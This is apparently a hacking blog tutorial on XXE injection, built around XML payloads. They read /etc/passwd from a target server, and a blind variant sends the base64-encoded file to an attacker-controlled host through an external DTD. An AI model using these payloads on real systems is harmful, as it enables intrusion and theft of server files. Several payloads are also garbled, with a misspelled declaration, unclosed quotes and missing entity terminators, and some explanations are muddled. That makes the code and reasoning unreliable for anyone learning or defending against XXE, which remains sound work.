Hi All,
In this post we will cover these following topics.
What is XXE?
How to confirm XXE?
How Exploit Basic XXE?
How Blind XXE works?
and a alternative of blind XXE payload.
But first let's understand some basic keywords.
Entity Entities reference data that act as an abbreviation or can be found at an external location. Syntax:- &test;
Internal Entity: If an entity is declared within a DTD it is called as internal entity.
Syntax: <!ENTITY entity_name "entity_value">
Syntax:- <!ENTITY entity_name SYSTEM "entity_value">Parameter Entity*The purpose of a parameter entity is to enable you to create reusable sections of replacement text. (If not understood, You will understand more clearly in later.)
Syntax:-<!ENTITY % entity "another entity (Internal or External)">
XXE is a short of XML External Entity, which is a vulnerablity found when misconfiguration XML parser parses enternal entities.
There are two types of XXE:-
1. Basic.
2. Blind.
Basic one:-
For ex you have a url with a parameter that parses XML data somthing like this:- 'http://myapp.com/somefile.php?xml=
Now when you provide any xml data, and that data is printing back to the user's browser then you can try basic XXE. You have to confirm the vulnerability existence and this can be done by something like this.
Payload 1<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM 'http://yourserverip/'>]>
<root>&test;</root>
Now let's understand this.
1.First we declare the xml Syntax, now, we define DOCTYPE to define the contents of XML body,
2.After that, we define root element after the DOCTYPE i.e. root, next, we define the Entity and that entity contains SYSTEM attribute which indicate that the entity is External.
3.After that we define our server's ip because we want to let the target server to send the request to us.
&test;and we define our server ip, So, it will process our External entity by requesting to your server ip
Our main target is to read local files of the web server and this can be done using this payload
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>
The xml parser will process this payload as same as above but instead of requesting to your server now it will request to locally, with the file protocol, it will grep the file contents and shown to us. Hence, we can read local file of the webserver.
Okay,
Still you can confirm the existence of the vulnerability by using the first payload above. But you can't see the file contents of local files of webserver. This is still an issue but now the severity is a ***little bit low.*** And, this is called Blind XXE OR Out-of-band XXE.
So we also needed to blind means we have to use blind payload which will grep the contents of the local files of the webserver and send the contents to our server. Sound interesting, let's see how this whole theory works and also let's see that if we have some alternatives to do that.
<?xml version="1.0"?>Your xml.dtd contents:-
<!DOCTYPE root [
<!ENTITY test SYSTEM 'http://yourserverip/xml.dtd'> %test; %exe]>
<root>&entity;</root>
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">` `<!ENTIY % exe "<!ENTITY entity SYSTEM 'http://yourserver/%file;'>">`Lot's of code to understand:-
Make sense?
Let's see how all this works.
Cool.
Now, Have anyone arise a question that why we call the dtd from attacker's server? Why not this below payload works?Payload 3
<?xml version="1.0"?>
<!DOCTYPE root [`
<!ENTITY % filecontents SYSTEM 'file:///etc/passwd>
<!ENTITY test SYSTEM 'http://yourserver/%filecontents;'>]>
<root>&test;</root>
this would be easier than before? Yes it is, but it is not going to work.
According to this XML_DOC, parameter entity can't be called inside the DTD subset, they can be called in the External subset (like we did in Payload no 2). It will be forbidden, hence you will get the forbidden error.
So that's the reason why we can't run above payload.
Let's try another payload:-
Payload 4
<?xml version="1.0"?>
<!DOCTYPE root [`
<!ENTITY filecontents SYSTEM 'file:///etc/passwd>
<!ENTITY test SYSTEM 'http://yourserver/&filecontents;'>]>
<root>&test;</root>
So this payload works without any problem but your entity (oops, wrong type) will act as string(that's the correct type), because entity should be in root tag, if it is not it will act as String.
That's all guys, I just want to share because I want. :). Any thing you want to edit please let me know.
Hope you like this read.
Have a good hacking day.
Thanks